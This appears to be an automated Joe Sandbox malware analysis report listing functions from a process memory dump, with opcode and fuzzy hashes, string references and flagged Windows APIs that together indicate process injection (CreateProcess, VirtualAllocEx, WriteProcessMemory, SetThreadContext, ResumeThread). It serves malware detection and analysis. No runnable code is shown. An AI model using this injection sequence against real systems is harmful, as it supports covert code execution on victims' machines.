API String ID: 0-2560852865
Opcode ID: 3a53a2df74d89b1223213d59e5441cf2acc53a6e9b1180be4e98383d6d565c45
Instruction ID: 073b305a70ed24b42a5c03c985bac4e862b61d5244887ed205cd4d265de81b9b
Opcode Fuzzy Hash: 3a53a2df74d89b1223213d59e5441cf2acc53a6e9b1180be4e98383d6d565c45
Instruction Fuzzy Hash: 58A1AF31A0CA098FDB99EF28D4452B97BE1EF88352F144179D45DC32C2DF29E822CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E5688 Relevance: 4.5, Strings: 3, Instructions: 734
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`J_H, xrefs: 00007FF8489EC474
@TFN, xrefs: 00007FF8489EC6D2
@TFN, xrefs: 00007FF8489EC6C0

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: @TFN$@TFN$`J_H
API String ID: 0-1860074254
Opcode ID: 81a624f075774b4d749c6576e12cd2b5ad55c646e1ffac8a07c2120f310c22c7
Instruction ID: 06bd3780d0bbba9e214eaa31aeae55c944c867d5fcf9abe266c7f76500ecf82a
Opcode Fuzzy Hash: 81a624f075774b4d749c6576e12cd2b5ad55c646e1ffac8a07c2120f310c22c7
Instruction Fuzzy Hash: B332E430A1CE098FEB98EB2884597797BE1FF59346F1401BDD48EC72D2CF29A8568744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489F1D28 Relevance: 3.1, Strings: 2, Instructions: 614COMMON

Download Yara Rule

Strings

@TFN, xrefs: 00007FF8489F2E05
UFN, xrefs: 00007FF8489F2437

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN$@TFN
API String ID: 0-2551223153
Opcode ID: 04f938d5090a59806fec3d6a1f186f6f8958fee53a1f603e1fcbaf2a07554994
Instruction ID: 3126cd4daa302a0c0c1987179c23feb9e3be164946dc032b192c664ae193812d
Opcode Fuzzy Hash: 04f938d5090a59806fec3d6a1f186f6f8958fee53a1f603e1fcbaf2a07554994
Instruction Fuzzy Hash: 5B12357291CE864FE3ADABA8441A3B47BD1EF963A2F0401BAD54DC71D3EE1C6C468345

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E8855 Relevance: 2.7, Strings: 2, Instructions: 240COMMON

Download Yara Rule

Strings

UFN, xrefs: 00007FF8489E8A6F
UFN, xrefs: 00007FF8489E89CD

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN$ UFN
API String ID: 0-2733903429
Opcode ID: f6ca2f28318732ca83c454235c5e5ac52d98f921cffd05d821f023e1b0eea3b5
Instruction ID: 6b63ebe47f25a27da7efabe756116dc822eb261d715097c4113753315bbe4e64
Opcode Fuzzy Hash: f6ca2f28318732ca83c454235c5e5ac52d98f921cffd05d821f023e1b0eea3b5
Instruction Fuzzy Hash: 96815330A18E4A8FDB99EF58C454BB8BBB2FF59741F1441A9C40DD7296DB38AC85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E88F9 Relevance: 2.7, Strings: 2, Instructions: 220COMMON

Download Yara Rule

Strings

UFN, xrefs: 00007FF8489E8A6F
UFN, xrefs: 00007FF8489E89CD

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN$ UFN
API String ID: 0-2733903429
Opcode ID: a83826c06cadcdd496dcf95eda9632db7dddda2ee86b84a008e6849c70162303
Instruction ID: e8ec3bbc411910012208bbe8b3721eb6e0d35c8b3121809bdbc96d3dfb4400d9
Opcode Fuzzy Hash: a83826c06cadcdd496dcf95eda9632db7dddda2ee86b84a008e6849c70162303
Instruction Fuzzy Hash: F6716530908E4A8FDB95EB68C454BB8BBB2FF55781F1441A9C40DD72D6DF38A885CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E46FA Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

UFN, xrefs: 00007FF8489E4759
UFN, xrefs: 00007FF8489E478D

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN$ UFN
API String ID: 0-2733903429
Opcode ID: d941089e9a7752cfcd919fba19508090cd47496cff91eb5f69c03955add6e200
Instruction ID: e5c6fc754872e025c90d5eec1fa6653c0281ca512f7245ca261bb2df267f7c70
Opcode Fuzzy Hash: d941089e9a7752cfcd919fba19508090cd47496cff91eb5f69c03955add6e200
Instruction Fuzzy Hash: 8F413432A1DD5A1FE744BB6C94592FABBA0EF85792F0480B7D04DC61C3EE1D98569380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B8A6C Relevance: 2.6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

0;FN, xrefs: 00007FF8489B8AFA
HQFN, xrefs: 00007FF8489B8AC7

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: 0;FN$HQFN
API String ID: 0-852396429
Opcode ID: f63146937a31451e3edcaddcd698202a43bbaf89c9a76eaf234c3c061086cc63
Instruction ID: 86e5b71d0b2db1331093a04af31d49f738192c15ee5b1b6656be4b8b44fcd27d
Opcode Fuzzy Hash: f63146937a31451e3edcaddcd698202a43bbaf89c9a76eaf234c3c061086cc63
Instruction Fuzzy Hash: BB11E731E0DECA4FE706A73444297647BA2FF66791F0806F7D449CB1C3DA2C59848355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B97B0 Relevance: 2.6, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

0;FN, xrefs: 00007FF8489B974D
PQFN, xrefs: 00007FF8489B9732

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: 0;FN$PQFN
API String ID: 0-2808346365
Opcode ID: 6ad5fece127a04bd70b7da882f44aaebb33f90bf038e5511be161daa483a0961
Instruction ID: 0a7fdb2a862a5794348ba5b00abf4d4ec2ec35826d60aacbbf7467aa039bd6e4
Opcode Fuzzy Hash: 6ad5fece127a04bd70b7da882f44aaebb33f90bf038e5511be161daa483a0961
Instruction Fuzzy Hash: 8F11E52191CA468FE70AAB2884543643791FF557A1F1541BED44ECB2C7EA3C6C828349

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B9715 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

0;FN, xrefs: 00007FF8489B974D
PQFN, xrefs: 00007FF8489B9732

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: 0;FN$PQFN
API String ID: 0-2808346365
Opcode ID: b752957e0da313a80183bed745ba036703757783a85b13c3634788b3b2203985
Instruction ID: 67143918479a3cf4b0c273f1d02deb5f7866e8543848b33ac91eda527e467059
Opcode Fuzzy Hash: b752957e0da313a80183bed745ba036703757783a85b13c3634788b3b2203985
Instruction Fuzzy Hash: 7001263190DA864FE70AAB2884143647B91FF5A791F1541FEC44ECF2C7DA3C6C868388

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B6EA5 Relevance: 2.5, Strings: 2, Instructions: 36COMMON

Download Yara Rule

Strings

OFN, xrefs: 00007FF8489B6EBA
9FN, xrefs: 00007FF8489B6ED1

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: OFN$9FN
API String ID: 0-2930192149
Opcode ID: 7f82ccffdbbd25e8ecfd736302c707ba60c172b0c3bae994e3678a46b7b07b53
Instruction ID: 69748126dd6d747d7430b7c23eae5b702de87ba754b8a3ca9491f405602cb748
Opcode Fuzzy Hash: 7f82ccffdbbd25e8ecfd736302c707ba60c172b0c3bae994e3678a46b7b07b53
Instruction Fuzzy Hash: 2AF0F632A0DE8A4FE74BAA2488546697B61FBA6791F0602F7D009CB1C3DE2C69885344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B9831 Relevance: 2.5, Strings: 2, Instructions: 31COMMON

Download Yara Rule

Strings

`QFN, xrefs: 00007FF8489B9846
0;FN, xrefs: 00007FF8489B985F

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: 0;FN$`QFN
API String ID: 0-1464340060
Opcode ID: 6de666fda98b7e7c3dda8ea48871fcd688bf105848dfa6a9581165abfa27c845
Instruction ID: e45138b3eeaddafccbe486232a810be06afe5a742ed267d44e35671f7a0bb0a1
Opcode Fuzzy Hash: 6de666fda98b7e7c3dda8ea48871fcd688bf105848dfa6a9581165abfa27c845
Instruction Fuzzy Hash: 53F0542191DACA4FE34BAF2844547647BA1FF16B81F0404FAE44DCB1C3DA2C6C858715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489F1CD0 Relevance: 2.0, Strings: 1, Instructions: 729COMMON

Download Yara Rule

Strings

UFN, xrefs: 00007FF8489F2437

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN
API String ID: 0-3695581293
Opcode ID: ff7d61f97109948a76153f7cc77f231845568b315b4858e8cdb8657962e1c065
Instruction ID: a9ccdaac995e3216b4909dd248062d32821d5964ab8bf5602eefc523be3af1a5
Opcode Fuzzy Hash: ff7d61f97109948a76153f7cc77f231845568b315b4858e8cdb8657962e1c065
Instruction Fuzzy Hash: E4228B32A0DE454FE35DBBBC94496F97BD0EF857A6F0801BAD14DCB193DE1868068385

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489F0658 Relevance: 1.9, Strings: 1, Instructions: 695COMMON

Download Yara Rule

Strings

@TFN, xrefs: 00007FF8489F1800

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: @TFN
API String ID: 0-3869410649
Opcode ID: 24f239f9be623fbc1b80e71c53748613918a419ac093fafcd419bc91ecb326b3
Instruction ID: 9a101ab41de5eb21fee005f383ad85041d00dc7de5bdb9b74b6ea5581662b2cb
Opcode Fuzzy Hash: 24f239f9be623fbc1b80e71c53748613918a419ac093fafcd419bc91ecb326b3
Instruction Fuzzy Hash: 1F220631A1CE4A4FE75EEB28848967977D1FF94781F04017DD58EC3286EE28F8528785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A170D9 Relevance: 1.9, APIs: 1, Instructions: 388processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE ref: 00007FF848A17425

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489f5000_TypeId.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f1fa7258401990501228ef6834d5e08f0c4efd753cbbab20a18dbcc33ea86eb1
Instruction ID: ef481f923b1b4497dcf66df3ced9c79d6306bd16a74235c4245a5bdea161bfd0
Opcode Fuzzy Hash: f1fa7258401990501228ef6834d5e08f0c4efd753cbbab20a18dbcc33ea86eb1
Instruction Fuzzy Hash: E0C1B330918B8D8FDBA8EF58DC467E977D1FB58350F10422AEC4EC7285DB7499818B92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E926D Relevance: 1.8, Strings: 1, Instructions: 561COMMON

Download Yara Rule

Strings

UFN, xrefs: 00007FF8489E9272

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN
API String ID: 0-3695581293
Opcode ID: d8ffabc18271c4223ee9719890d27fcafb1efd48c20b9ca88afaee7207f82d6b
Instruction ID: 76ba1cd3cc8e971a6f2906550abe3f7e4b8be7ef4d7ed432fdb3d48cd5634333
Opcode Fuzzy Hash: d8ffabc18271c4223ee9719890d27fcafb1efd48c20b9ca88afaee7207f82d6b
Instruction Fuzzy Hash: 3F128F30A1CA498FEB99EF28C4487757BE1FF59345F1041AED04EC7292DB39A892CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489ECEA3 Relevance: 1.7, Strings: 1, Instructions: 418COMMON

Download Yara Rule

Strings

UFN, xrefs: 00007FF8489ECF2E

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN
API String ID: 0-3695581293
Opcode ID: fb7ccc71039c342f6571d0355d6e79dbb6a6d1ef3f6035b06f50c6412fbe8357
Instruction ID: fcbc90db8254f78eb03f826a8b86283f52539511220f2470845032a2fabb5c90
Opcode Fuzzy Hash: fb7ccc71039c342f6571d0355d6e79dbb6a6d1ef3f6035b06f50c6412fbe8357
Instruction Fuzzy Hash: B8C16E3071CD098FDB98EF1CD458A797BE1EF59342B1541B9E84ECB2A6DE24EC528740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489ECE80 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

UFN, xrefs: 00007FF8489ECF2E

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN
API String ID: 0-3695581293
Opcode ID: 067193c78acf6b2077a93ff8cd801024f9c69f1de9c02189ab694a14f4e12305
Instruction ID: df63ae1f461b8dd171eef156ff320d2109cef0115014d6074349874e76fd98dd
Opcode Fuzzy Hash: 067193c78acf6b2077a93ff8cd801024f9c69f1de9c02189ab694a14f4e12305
Instruction Fuzzy Hash: B5B16F3061CD098FDB98EF1CC458A797BE1EF59342B0541B9E84ECB2A6DE28EC52C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A16DC9 Relevance: 1.6, APIs: 1, Instructions: 131injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE ref: 00007FF848A16E8F

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489f5000_TypeId.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6a0de91b0059dd5b7c6689cb9005f0fd3948f33dfe73fc90a392f5a23a4f6919
Instruction ID: 1e86b9c6da500c50c0b0a642bb188fd9fda3f21b548e3d5886d024627a7e1713
Opcode Fuzzy Hash: 6a0de91b0059dd5b7c6689cb9005f0fd3948f33dfe73fc90a392f5a23a4f6919
Instruction Fuzzy Hash: E631133190CB5C4FDB18EF5898066E9BBE0FB59710F04426FD049D3282CB74AC0587D2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A16C89 Relevance: 1.6, APIs: 1, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE ref: 00007FF848A16D3D

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489f5000_TypeId.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 52db88a9b6f3bad0333ae7f273b3a938825ce5a11cee1c1dab5694e3bf54d842
Instruction ID: dad2a3b00ae6eacfc707d5da80e6ef4fa16ce4e19db5b9617a7379aa68578bb6
Opcode Fuzzy Hash: 52db88a9b6f3bad0333ae7f273b3a938825ce5a11cee1c1dab5694e3bf54d842
Instruction Fuzzy Hash: B131063190CB4C4FDB18AB6C980A6ED7BE0FB65310F04426FD04AC3292DB74A8168BD6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489F0015 Relevance: 1.6, Strings: 1, Instructions: 361COMMON

Download Yara Rule

Strings

d, xrefs: 00007FF8489F0299

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: ec936a74fe5a7b89c2b5b507fb08041d4fb9e4992fe836b016f36e60f216f09a
Instruction ID: 8bdca1ef6f464c96d351bca6726bf3ac642d853e81685139897079b2303bf445
Opcode Fuzzy Hash: ec936a74fe5a7b89c2b5b507fb08041d4fb9e4992fe836b016f36e60f216f09a
Instruction Fuzzy Hash: F2B1CB30A1CA098FDB4CEF08D485575B7E2FF98351B1445B9DA4AC728ADB35E843CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A16B19 Relevance: 1.6, APIs: 1, Instructions: 103threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE ref: 00007FF848A16BAE

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489f5000_TypeId.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: d7b10dfeedb7eaab19040d8f2f551835bc2842830097d77a0d94cf29b699d05b
Instruction ID: eb6a26f9211972d050c8a3329d947822fb1e6f7b6eeb0947da106ee40fce3a23
Opcode Fuzzy Hash: d7b10dfeedb7eaab19040d8f2f551835bc2842830097d77a0d94cf29b699d05b
Instruction Fuzzy Hash: A631C53190DB484FDB28EF68985A6FD7BE0EB55311F04417FD08AC3292DA78A949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B5593 Relevance: 1.6, Strings: 1, Instructions: 351COMMON

Download Yara Rule

Strings

@NFN, xrefs: 00007FF8489B5663

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: @NFN
API String ID: 0-4145259519
Opcode ID: dde0179d0e90590dc5d137e034be3d93210d1a3c61449b28c8c64eac81740ff7
Instruction ID: f3831b7fe4bca5ef300e524368d3d397f2d0ff37ed80adc992ac9a5cdb1c0cf0
Opcode Fuzzy Hash: dde0179d0e90590dc5d137e034be3d93210d1a3c61449b28c8c64eac81740ff7
Instruction Fuzzy Hash: D8C1A921A0DE874FD78AEB388455665BFE1FF56780B1540EBC44DCB297DE38A98A8700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A168C0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00007FF848A16947

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489f5000_TypeId.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5f1190686d438ecac2313b5308c0fba7e1e695bbbd2daf7b629769faf45c3be7
Instruction ID: f71e98a200d152c330cc295afa30ef2cf60acd20bf232aa1df676f3eb4e891df
Opcode Fuzzy Hash: 5f1190686d438ecac2313b5308c0fba7e1e695bbbd2daf7b629769faf45c3be7
Instruction Fuzzy Hash: F921D33190DA4C8FDB59EFA8985A7ED7BE0EF55320F04416FD049C7292DAB49805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B1304 Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

/N_^, xrefs: 00007FF8489B1501

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b0000_TypeId.jbxd

Similarity

API ID:
String ID: /N_^
API String ID: 0-316800470
Opcode ID: 6bc143d317d4ba4688cf03e6ed1738d8dc3b2903bdc6ff64f33860bf1599e71d
Instruction ID: 2484b8f298fb02bade95fe82be6e4257fac4cedf0f06344253fbcf80ab066703
Opcode Fuzzy Hash: 6bc143d317d4ba4688cf03e6ed1738d8dc3b2903bdc6ff64f33860bf1599e71d
Instruction Fuzzy Hash: 7291C627B0D9A15FD3117BBDB8055EDBF90EF926BBB0841B7C288CA093D908245983E5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E4B30 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

XUFN, xrefs: 00007FF8489E4D30

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: XUFN
API String ID: 0-1926074398
Opcode ID: 739155e47d5a736c4facd169e558572eba8ba1349d283a39e6ec29f3d611df87
Instruction ID: f895076a01f4ba2ef5340bb59b476e66c5a074aa61a0b2c289800e2cb0dfa603
Opcode Fuzzy Hash: 739155e47d5a736c4facd169e558572eba8ba1349d283a39e6ec29f3d611df87
Instruction Fuzzy Hash: F5813731A0DD494FE794EB2888596B87FE0EF99352F0801FAD049CB2D2EF2DA855C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489F1509 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

@TFN, xrefs: 00007FF8489F1800

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: @TFN
API String ID: 0-3869410649
Opcode ID: 0f7784af8eaad9a815296f533071388d399ca93f3e8743e230d504ed5938e576
Instruction ID: 227cda9387741f0a6784468861f7c25e2e05e72345533f456f009a308a8566bf
Opcode Fuzzy Hash: 0f7784af8eaad9a815296f533071388d399ca93f3e8743e230d504ed5938e576
Instruction Fuzzy Hash: F781D230A1DE464FE75AEB2884456B9BBE1FF55381F0401BEE48EC3292DF28F8518785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E5588 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

~J_H, xrefs: 00007FF8489EA66E

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: ~J_H
API String ID: 0-2458749084
Opcode ID: 3b7c0dc4f9b73aa30db053d30eb786e01a505cf59c344d764831f76f9d1ad0ae
Instruction ID: 5671d6f67d482fcefd3036ff1275acbf7e8b51c2ecb5fc3c9de80b10d76c2418
Opcode Fuzzy Hash: 3b7c0dc4f9b73aa30db053d30eb786e01a505cf59c344d764831f76f9d1ad0ae
Instruction Fuzzy Hash: D0519371F1CD094FE6A4EA2C945C7792BD2FFA9B95B0501B9E40EC32E6DF28AC524344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B13FB Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

/N_^, xrefs: 00007FF8489B1501

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b0000_TypeId.jbxd

Similarity

API ID:
String ID: /N_^
API String ID: 0-316800470
Opcode ID: cd25a887e1ccf5868d0e9ae49c7dc3e8d006bf17b137236c054a07c900067abd
Instruction ID: 91992bbcd92bc01e6d5ab53bda51c2acdbb4c7d4f9667b380bbd4dd46f4efce6
Opcode Fuzzy Hash: cd25a887e1ccf5868d0e9ae49c7dc3e8d006bf17b137236c054a07c900067abd
Instruction Fuzzy Hash: 7551B327A0D9665ED6113BECB8095EDBF90EF927F7F084173D288CA093D908244583E9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E5878 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

8TFN, xrefs: 00007FF8489E5A9F

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: 8TFN
API String ID: 0-1210649898
Opcode ID: 042db944a6d318f4056e35fdfe4575acfc40c8fa1a3901a6834e211240ef9c8d
Instruction ID: 31d6dfa2c6c0a23013b1f67faa24b03506dbc06858c406536a9b5b792c674535
Opcode Fuzzy Hash: 042db944a6d318f4056e35fdfe4575acfc40c8fa1a3901a6834e211240ef9c8d
Instruction Fuzzy Hash: 3D514632D1DE864FE7A6AB3854592BA7FE0EF55791F0401BBD049C72C3EE1CA8158341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E84FA Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

J_^, xrefs: 00007FF8489E8512

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: J_^
API String ID: 0-868019308
Opcode ID: 1e4bd7a6a1e4324245fa6193d623e7e43639fcd373b0d633ce4568fce702b6a9
Instruction ID: e31cb45331280152847e411942c19c07cf6fb8abc5cb8e9213d199641e301e86
Opcode Fuzzy Hash: 1e4bd7a6a1e4324245fa6193d623e7e43639fcd373b0d633ce4568fce702b6a9
Instruction Fuzzy Hash: AE515C71A0CA5D8FDB99EE28C855AB63BE1FF59351F1000A9E44AC72D2DE39EC12C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489BDF23 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

pPFN, xrefs: 00007FF8489BDFA0

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: pPFN
API String ID: 0-293655844
Opcode ID: c6d849284785657fb2162f706d5475813bd0082e3e96db173413b198f30479ac
Instruction ID: 64f3eeb6722baa83955480ffa4152e100c6e5dfe6ec72fa983b744c6b9794f83
